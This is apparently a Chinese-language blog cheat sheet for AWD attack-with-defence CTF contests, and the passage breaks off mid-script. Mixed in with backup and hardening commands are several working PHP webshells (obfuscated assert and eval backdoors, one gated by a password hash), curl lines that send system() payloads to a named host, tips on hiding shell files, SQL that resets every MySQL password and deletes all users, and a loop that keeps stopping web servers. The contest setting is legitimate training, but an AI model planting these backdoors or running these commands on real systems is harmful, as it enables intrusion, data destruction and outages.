<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="&amp;#x5E38;&amp;#x7528;&amp;#x547D;&amp;#x4EE4;       &amp;#x4E00;&amp;#x822C;&amp;#x7528;&amp;#x4E8E;&amp;#x52A0;&amp;#x56FA;&amp;#x9636;&amp;#x6BB5;">
<meta property="og:type" content="article">
<meta property="og:title" content="awd-awd">
<meta property="og:url" content="http://example.com/2023/04/10/awd-awd/index.html">
<meta property="og:site_name" content="Clutter Box">
<meta property="og:description" content="&amp;#x5E38;&amp;#x7528;&amp;#x547D;&amp;#x4EE4;       &amp;#x4E00;&amp;#x822C;&amp;#x7528;&amp;#x4E8E;&amp;#x52A0;&amp;#x56FA;&amp;#x9636;&amp;#x6BB5;">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-04-10T02:27:03.000Z">
<meta property="article:modified_time" content="2023-06-05T02:50:35.658Z">
<meta property="article:author" content="Kirsten Carton">
<meta property="article:tag" content="awd">
<meta property="article:tag" content="shell-script">
<meta property="article:tag" content="tricks">
<meta name="twitter:card" content="summary"><title>awd-awd | Clutter Box</title><link ref="canonical" href="http://example.com/2023/04/10/awd-awd/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><script src="https://www.googletagmanager.com/gtag/js?id=G-Q0LPD8MD2C" async=""></script><script>if (window.location.hostname !== 'localhost') {
  window.dataLayer = window.dataLayer || [];
  function gtag(){ dataLayer.push(arguments); }
  gtag('js', new Date());
  gtag('config', 'G-Q0LPD8MD2C');
}</script><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Clutter Box</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">awd-awd</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2023-04-10</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2023-06-05</span></span></div></header><div class="post-body">
        <h2 id="&#x5E38;&#x7528;&#x547D;&#x4EE4;">
          <a href="#&#x5E38;&#x7528;&#x547D;&#x4EE4;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x5E38;&#x7528;&#x547D;&#x4EE4;" class="headerlink" title="&#x5E38;&#x7528;&#x547D;&#x4EE4;"></a>&#x5E38;&#x7528;&#x547D;&#x4EE4;</h2>
      <p>&#x4E00;&#x822C;&#x7528;&#x4E8E;&#x52A0;&#x56FA;&#x9636;&#x6BB5;</p>
<span id="more"></span>


        <h3 id="&#x6253;&#x5305;">
          <a href="#&#x6253;&#x5305;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6253;&#x5305;" class="headerlink" title="&#x6253;&#x5305;"></a>&#x6253;&#x5305;</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tar&#xA0;-cvf&#xA0;web.tar&#xA0;/var/www/html</span><br><span class="line">zip&#xA0;-q&#xA0;-r&#xA0;web.zip&#xA0;/var/www/html</span><br></pre></td></tr></table></div></figure>



<blockquote>
<p>tar&#xFF1A;&#x8868;&#x793A;&#x8C03;&#x7528;tar&#x547D;&#x4EE4;&#xFF1B;</p>
</blockquote>
<ul>
<li>-c&#xFF1A;&#x8868;&#x793A;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x65B0;&#x7684;&#x538B;&#x7F29;&#x5305;&#xFF1B;</li>
<li>-v&#xFF1A;&#x8868;&#x793A;&#x5728;&#x538B;&#x7F29;&#x8FC7;&#x7A0B;&#x4E2D;&#x663E;&#x793A;&#x8BE6;&#x7EC6;&#x7684;&#x4FE1;&#x606F;&#xFF1B;</li>
<li>-f&#xFF1A;&#x8868;&#x793A;&#x6307;&#x5B9A;&#x538B;&#x7F29;&#x5305;&#x7684;&#x6587;&#x4EF6;&#x540D;&#xFF0C;&#x540E;&#x9762;&#x7D27;&#x8DDF;&#x7684;&#x662F;&#x8981;&#x521B;&#x5EFA;&#x7684;&#x538B;&#x7F29;&#x5305;&#x7684;&#x540D;&#x79F0;&#xFF1B;</li>
</ul>

        <h3 id="&#x5907;&#x4EFD;&#x6570;&#x636E;&#x5E93;">
          <a href="#&#x5907;&#x4EFD;&#x6570;&#x636E;&#x5E93;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x5907;&#x4EFD;&#x6570;&#x636E;&#x5E93;" class="headerlink" title="&#x5907;&#x4EFD;&#x6570;&#x636E;&#x5E93;"></a>&#x5907;&#x4EFD;&#x6570;&#x636E;&#x5E93;</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysqldump -u root -p root --databases DB1 DB2 &gt; /tmp/db.sql</span><br></pre></td></tr></table></div></figure>

<ul>
<li>&#x2013;lock-tables&#xFF1A;&#x5728;&#x5BFC;&#x51FA;&#x8868;&#x6570;&#x636E;&#x4E4B;&#x524D;&#x9501;&#x5B9A;&#x8868;&#xFF0C;&#x4EE5;&#x786E;&#x4FDD;&#x6570;&#x636E;&#x7684;&#x4E00;&#x81F4;&#x6027;&#xFF1B;</li>
<li>&#x2013;result-file&#xFF1A;&#x6307;&#x5B9A;&#x5907;&#x4EFD;&#x6587;&#x4EF6;&#x7684;&#x8DEF;&#x5F84;&#x548C;&#x6587;&#x4EF6;&#x540D;&#x3002;</li>
</ul>

        <h4 id="&#x6062;&#x590D;&#x5907;&#x4EFD;">
          <a href="#&#x6062;&#x590D;&#x5907;&#x4EFD;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6062;&#x590D;&#x5907;&#x4EFD;" class="headerlink" title="&#x6062;&#x590D;&#x5907;&#x4EFD;"></a>&#x6062;&#x590D;&#x5907;&#x4EFD;</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">source /tmp/db.sql</span><br></pre></td></tr></table></div></figure>


        <h4 id="&#x91CD;&#x7F6E;mysql&#x5BC6;&#x7801;">
          <a href="#&#x91CD;&#x7F6E;mysql&#x5BC6;&#x7801;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x91CD;&#x7F6E;mysql&#x5BC6;&#x7801;" class="headerlink" title="&#x91CD;&#x7F6E;mysql&#x5BC6;&#x7801;"></a>&#x91CD;&#x7F6E;mysql&#x5BC6;&#x7801;</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set password for user@localhost = password(&quot;123123&quot;)</span><br><span class="line"></span><br><span class="line">mysqladmin -u user -p oldpswd password 123123</span><br></pre></td></tr></table></div></figure>


        <h4 id="&#x597D;&#x7528;&#x7684;&#x5BC6;&#x7801;&#xFF01;&#xFF01;&#xFF01;">
          <a href="#&#x597D;&#x7528;&#x7684;&#x5BC6;&#x7801;&#xFF01;&#xFF01;&#xFF01;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x597D;&#x7528;&#x7684;&#x5BC6;&#x7801;&#xFF01;&#xFF01;&#xFF01;" class="headerlink" title="&#x597D;&#x7528;&#x7684;&#x5BC6;&#x7801;&#xFF01;&#xFF01;&#xFF01;"></a>&#x597D;&#x7528;&#x7684;&#x5BC6;&#x7801;&#xFF01;&#xFF01;&#xFF01;</h4>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">update mysql.user set authentication_string=PASSWORD(&apos;p4rr0t&apos;);# &#x4FEE;&#x6539;&#x6240;&#x6709;&#x7528;&#x6237;&#x5BC6;&#x7801;</span><br><span class="line">flush privileges;</span><br><span class="line">UPDATE mysql.user SET User=&apos;aaaaaaaaaaaa&apos; WHERE user=&apos;root&apos;; </span><br><span class="line">flush privileges;</span><br><span class="line">delete from mysql.user ;#&#x5220;&#x9664;&#x6240;&#x6709;&#x7528;&#x6237;</span><br><span class="line">flush privileges;</span><br></pre></td></tr></table></div></figure>


        <h3 id="&#x91CD;&#x542F;-apache2-&#x548C;-nigix">
          <a href="#&#x91CD;&#x542F;-apache2-&#x548C;-nigix" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x91CD;&#x542F;-apache2-&#x548C;-nigix" class="headerlink" title="&#x91CD;&#x542F; apache2 &#x548C; nigix"></a>&#x91CD;&#x542F; apache2 &#x548C; nigix</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env sh</span><br><span class="line">while [[ 1 ]]</span><br><span class="line">do</span><br><span class="line">    service apache2 stop</span><br><span class="line">    service nginx stop</span><br><span class="line">done &amp;</span><br></pre></td></tr></table></div></figure>






        <h2 id="&#x4E3B;&#x673A;&#x63A2;&#x6D4B;">
          <a href="#&#x4E3B;&#x673A;&#x63A2;&#x6D4B;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x4E3B;&#x673A;&#x63A2;&#x6D4B;" class="headerlink" title="&#x4E3B;&#x673A;&#x63A2;&#x6D4B;"></a>&#x4E3B;&#x673A;&#x63A2;&#x6D4B;</h2>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">for x in range(2,255):</span><br><span class="line">&#xA0; &#xA0; url = &quot;http://IP.{}.cn&quot;.format(x)</span><br><span class="line">&#xA0; &#xA0; try:</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; r = requests.get(url=url, timeout=1)</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; # if r.status_code == 200 or r.status_code == 403 :</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; if r.status_code != 502:</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; &#xA0; &#xA0; print(r.status_code)</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; &#xA0; &#xA0; print(url)</span><br><span class="line">&#xA0; &#xA0; except:</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; pass</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x8FD8;&#x6709;&#x4E00;&#x4E2A;ICMP&#x63A2;&#x6D4B;&#x7684;nmap&#x6307;&#x4EE4;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sn 192.168.0.1-254</span><br></pre></td></tr></table></div></figure>




        <h3 id="&#x63D0;&#x4EA4;post&#x53C2;&#x6570;&#x6216;&#x8005;get&#x8BF7;&#x6C42;">
          <a href="#&#x63D0;&#x4EA4;post&#x53C2;&#x6570;&#x6216;&#x8005;get&#x8BF7;&#x6C42;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x63D0;&#x4EA4;post&#x53C2;&#x6570;&#x6216;&#x8005;get&#x8BF7;&#x6C42;" class="headerlink" title="&#x63D0;&#x4EA4;post&#x53C2;&#x6570;&#x6216;&#x8005;get&#x8BF7;&#x6C42;"></a>&#x63D0;&#x4EA4;post&#x53C2;&#x6570;&#x6216;&#x8005;get&#x8BF7;&#x6C42;</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl [option] &lt;url&gt;</span><br></pre></td></tr></table></div></figure>

<hr>
<p>&#x4EE5;&#x4E0B;&#x662F;&#x4E00;&#x4E2A;&#x4F7F;&#x7528;curl&#x53D1;&#x9001;HTTP POST&#x8BF7;&#x6C42;&#x7684;&#x4F8B;&#x5B50;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST -H &quot;Content-Type: application/json&quot; -d &apos;{&quot;name&quot;: &quot;John&quot;, &quot;age&quot;: 30}&apos; https://example.com/api/users</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x8FD9;&#x4E2A;&#x547D;&#x4EE4;&#x4F1A;&#x5411;&#x201D;<a href="https://example.com/api/users&quot;%E5%8F%91%E9%80%81%E4%B8%80%E4%B8%AAHTTP">https://example.com/api/users&quot;&#x53D1;&#x9001;&#x4E00;&#x4E2A;HTTP</a>&#xA0;POST&#x8BF7;&#x6C42;&#xFF0C;&#x8BF7;&#x6C42;&#x4F53;&#x4E2D;&#x5305;&#x542B;&#x4E00;&#x4E2A;JSON&#x683C;&#x5F0F;&#x7684;&#x6570;&#x636E;&#xFF1A;{&#x201C;name&#x201D;: &#x201C;John&#x201D;, &#x201C;age&#x201D;: 30}&#x3002;&#x8BF7;&#x6C42;&#x5934;&#x90E8;&#x4FE1;&#x606F;&#x4E2D;&#x6307;&#x5B9A;&#x4E86;Content-Type&#x4E3A;application/json&#x3002;</p>
<p>&#x5982;&#x679C;&#x8BF7;&#x6C42;&#x6210;&#x529F;&#xFF0C;&#x670D;&#x52A1;&#x5668;&#x5C06;&#x8FD4;&#x56DE;&#x4E00;&#x4E2A;HTTP&#x54CD;&#x5E94;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x4EE5;&#x4E0B;&#x547D;&#x4EE4;&#x6765;&#x67E5;&#x770B;&#x54CD;&#x5E94;&#x4F53;&#x7684;&#x5185;&#x5BB9;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -X GET https://example.com/api/users</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x8FD9;&#x4E2A;&#x547D;&#x4EE4;&#x4F1A;&#x5411;&#x201D;<a href="https://example.com/api/users&quot;%E5%8F%91%E9%80%81%E4%B8%80%E4%B8%AAHTTP">https://example.com/api/users&quot;&#x53D1;&#x9001;&#x4E00;&#x4E2A;HTTP</a>&#xA0;GET&#x8BF7;&#x6C42;&#xFF0C;&#x8FD4;&#x56DE;&#x670D;&#x52A1;&#x5668;&#x54CD;&#x5E94;&#x7684;&#x5185;&#x5BB9;&#x3002;&#x5982;&#x679C;&#x54CD;&#x5E94;&#x7684;&#x5185;&#x5BB9;&#x662F;JSON&#x683C;&#x5F0F;&#x7684;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;jq&#x547D;&#x4EE4;&#x6765;&#x89E3;&#x6790;&#x548C;&#x5904;&#x7406;JSON&#x6570;&#x636E;&#x3002;</p>
<p>&#x8BF7;&#x6CE8;&#x610F;&#xFF0C;&#x5B9E;&#x9645;&#x5E94;&#x7528;&#x4E2D;&#xFF0C;&#x53D1;&#x9001;HTTP&#x8BF7;&#x6C42;&#x901A;&#x5E38;&#x9700;&#x8981;&#x63D0;&#x4F9B;&#x5176;&#x4ED6;&#x53C2;&#x6570;&#x548C;&#x8BA4;&#x8BC1;&#x4FE1;&#x606F;&#xFF0C;&#x4F8B;&#x5982;HTTP&#x57FA;&#x672C;&#x8BA4;&#x8BC1;&#x3001;OAuth&#x8BA4;&#x8BC1;&#x7B49;&#x3002;&#x5177;&#x4F53;&#x7684;&#x8BF7;&#x6C42;&#x65B9;&#x5F0F;&#x548C;&#x53C2;&#x6570;&#x53D6;&#x51B3;&#x4E8E;API&#x63A5;&#x53E3;&#x7684;&#x8981;&#x6C42;&#x548C;&#x8BBE;&#x8BA1;&#x3002;</p>
<p> &#x4F8B;&#x5982;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &quot;rarara.cn&quot; -d &quot;a=system(&apos;ls /&apos;);&quot;</span><br></pre></td></tr></table></div></figure>

<p>&#x672C;&#x673A;&#x5C1D;&#x8BD5;&#x6210;&#x529F;&#xFF1A;curl &#x201C;<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://rarara.cn/shell0414.php&quot;">http://rarara.cn/shell0414.php&quot;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> -d &#x201C;1=phpinfo();&#x201D;</p>
<hr>
<p>&#x4F7F;&#x7528;&#x7684;&#x811A;&#x672C;&#xFF08;&#x8BF4;&#x5B9E;&#x8BDD;&#x8981;&#x6743;&#x9650;&#x8FD8;&#x662F;&#x5F97;&#x662F;&#x8681;&#x5251;&#xFF0C;&#x63D0;&#x4EA4;flag&#x8FD8;&#x662F;&#x8981;&#x7528;&#x4F20;&#x7EDF;&#x7684;&#xFF09;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></div></figure>


        <h2 id="&#x9690;&#x85CF;shell">
          <a href="#&#x9690;&#x85CF;shell" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x9690;&#x85CF;shell" class="headerlink" title="&#x9690;&#x85CF;shell"></a>&#x9690;&#x85CF;shell</h2>
      
        <h4 id="shell-php">
          <a href="#shell-php" class="heading-link"><i class="fas fa-link"></i></a><a href="#shell-php" class="headerlink" title=".shell.php"></a>.shell.php</h4>
      
        <h4 id="shell-php-1">
          <a href="#shell-php-1" class="heading-link"><i class="fas fa-link"></i></a><a href="#shell-php-1" class="headerlink" title="-shell.php"></a>-shell.php</h4>
      <p>&#x8FD9;&#x4E2A;&#x6CA1;&#x6CD5;&#x7528;rm&#x5220;&#xFF0C;&#x786E;&#x5B9E;&#xFF0C;&#x53EA;&#x80FD;&#x624B;&#x52A8;&#x5220;&#x9664;</p>
<blockquote>
<p> &#x548C;&#x4E00;&#x4F4D;&#x5927;&#x54E5;&#x4EA4;&#x6D41;&#xFF0C;&#x77E5;&#x9053;&#x4E86;&#x4F7F;&#x7528;&#x7EDD;&#x5BF9;&#x8DEF;&#x5F84;&#x6765;&#x5BF9;&#x8FD9;&#x79CD;&#x6587;&#x4EF6;&#x64CD;&#x4F5C;</p>
</blockquote>

        <h3 id="&#x7279;&#x6B8A;&#x7684;shell">
          <a href="#&#x7279;&#x6B8A;&#x7684;shell" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x7279;&#x6B8A;&#x7684;shell" class="headerlink" title="&#x7279;&#x6B8A;&#x7684;shell"></a>&#x7279;&#x6B8A;&#x7684;shell</h3>
      <ol>
<li></li>
</ol>
<p>assert()&#x51FD;&#x6570;&#x7528;&#x4E8E;&#x5728;PHP&#x4E2D;&#x6267;&#x884C;&#x4E00;&#x6BB5;&#x547D;&#x4EE4;&#xFF0C;&#x5E76;&#x5C06;&#x5176;&#x7ED3;&#x679C;&#x4F5C;&#x4E3A;&#x5E03;&#x5C14;&#x503C;&#x8FD4;&#x56DE;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php ($_=@$_GET[2]).@$_($_POST[1])?&gt;</span><br><span class="line">---</span><br><span class="line">&#x8FDE;&#x63A5;&#x65B9;&#x5F0F;&#xFF1A;php?2=assert&#x5BC6;&#x7801;&#x662F;1&#x3002;</span><br><span class="line">&#x76F8;&#x5F53;&#x4E8E;</span><br><span class="line">assert($_POST[1])</span><br></pre></td></tr></table></div></figure>

<blockquote>
<p>1:50&#x5F00;&#x59CB;&#x6E05;&#x9192;&#x4E86;&#xFF0C;&#x6BD4;&#x4EF7;&#x6B23;&#x6170;&#xFF0C;&#x591A;&#x770B;&#x70B9;&#xFF0C;&#x591A;&#x79EF;&#x7D2F;&#x70B9;&#xFF0C;&#x73A9;&#x610F;&#x7528;&#x7684;&#x5230;&#x5462;&#xFF0C;&#x8FD8;&#x6709;&#x591A;&#x770B;&#x4E0B;&#x4EE3;&#x7801;</p>
</blockquote>
<ol start="2">
<li></li>
</ol>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a=chr( 96^5);</span><br><span class="line">$b=chr( 57^79);</span><br><span class="line">$c=chr( 15^110);</span><br><span class="line">$d=chr( 58^86);</span><br><span class="line">$e= &apos;($_REQUEST[C])&apos;;</span><br><span class="line">@assert($a.$b.$c.$d.$e);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></div></figure>

<ol start="3">
<li></li>
</ol>
<p>&#x770B;&#x4E86;&#x6587;&#x6863;&#xFF0C;php&#x4E0D;&#x6B7B;&#x9A6C;&#x5E38;&#x7528;&#x51FD;&#x6570;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ignore_user_abort(true);</span><br><span class="line">set_time_linit;</span><br><span class="line">usleep()                # &#x662F;PHP&#x5185;&#x7F6E;&#x51FD;&#x6570;&#x4E4B;&#x4E00;&#xFF0C;&#x7528;&#x4E8E;&#x8BA9;&#x5F53;&#x524D;&#x811A;&#x672C;&#x6682;&#x505C;&#x6307;&#x5B9A;&#x7684;&#x5FAE;&#x79D2;&#x6570;</span><br></pre></td></tr></table></div></figure>

<p>&#x5E38;&#x7528;&#x65B9;&#x6CD5;&#xFF1A;md5</p>
<p>&#x4E3B;&#x8981;&#x662F;&#x8BBE;&#x7F6E;&#x5BC6;&#x7801;&#x7684;&#x8FD9;&#x91CC;&#x7684;&#x5BC6;&#x7801;&#x662F;&#xFF1A;huadaqingnian407&#x3002;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(md5($_POST[&apos;a&apos;])==&apos;59c6d6bd057da74deecf068e3f6cc19d&apos;)</span><br><span class="line">@eval($_POST[&apos;b&apos;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></div></figure>




        <h4 id="&#x5220;&#x9664;&#x4E0D;&#x6B7B;&#x9A6C;">
          <a href="#&#x5220;&#x9664;&#x4E0D;&#x6B7B;&#x9A6C;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x5220;&#x9664;&#x4E0D;&#x6B7B;&#x9A6C;" class="headerlink" title="&#x5220;&#x9664;&#x4E0D;&#x6B7B;&#x9A6C;"></a>&#x5220;&#x9664;&#x4E0D;&#x6B7B;&#x9A6C;</h4>
      <p>&#x81EA;&#x5DF1;&#x5199;&#x7684;&#xFF0C;&#x6709;&#x70B9;&#x95EE;&#x9898;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">while true;</span><br><span class="line">do</span><br><span class="line">&#xA0; &#xA0; if [ ! -z `find -name shell0812.php` ];then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; rm -rf ./shell0812.php</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">done</span><br><span class="line">echo &quot;delete?&quot;</span><br></pre></td></tr></table></div></figure>

<p>GPT&#x5E2E;&#x6211;&#x6539;&#x7684;&#xFF0C;&#x4F7F;&#x7528;&#x4E86;-f&#x53C2;&#x6570;&#xFF0C;&#x636E;&#x8BF4;&#x6BD4;find&#x597D;&#x7528;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">while true;</span><br><span class="line">do</span><br><span class="line">&#xA0; &#xA0; if [ -f ./shell0812.php ]; then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; rm -f ./shell0812.php</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; echo &quot;delete?&quot;</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">done</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x6539;&#x597D;&#x4E86;&#xFF0C;&#x53EF;&#x4EE5;&#x4E00;&#x8BD5;&#x3002;&#x3002;</p>
<p>&#x5982;&#x679C;&#x662F;&#x7EC8;&#x6B62;&#x8FDB;&#x7A0B;&#xFF1A; &#x4F46;&#x662F;&#x6709;&#x95EE;&#x9898;&#xFF0C;&#x4E8E;&#x662F;&#x95EE;&#x4E86;&#x4E00;&#x4E0B;&#x54EA;&#x91CC;&#x6709;&#x8BED;&#x6CD5;&#x9519;&#x8BEF;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">while true;</span><br><span class="line">do</span><br><span class="line">&#xA0; &#xA0; if [ -f ./shell0812.php ]; then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; rm -f ./shell0812.php</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; echo &quot;delete?&quot;</span><br><span class="line">&#xA0; &#xA0; fi</span><br><span class="line">&#xA0; &#xA0; if [! -z &quot;ps aux | grep shell0812.php&quot;]; then</span><br><span class="line">&#xA0; &#xA0; &#xA0; &#xA0; pkill -f shell0812.php</span><br><span class="line">&#xA0; &#xA0; &#xA0; 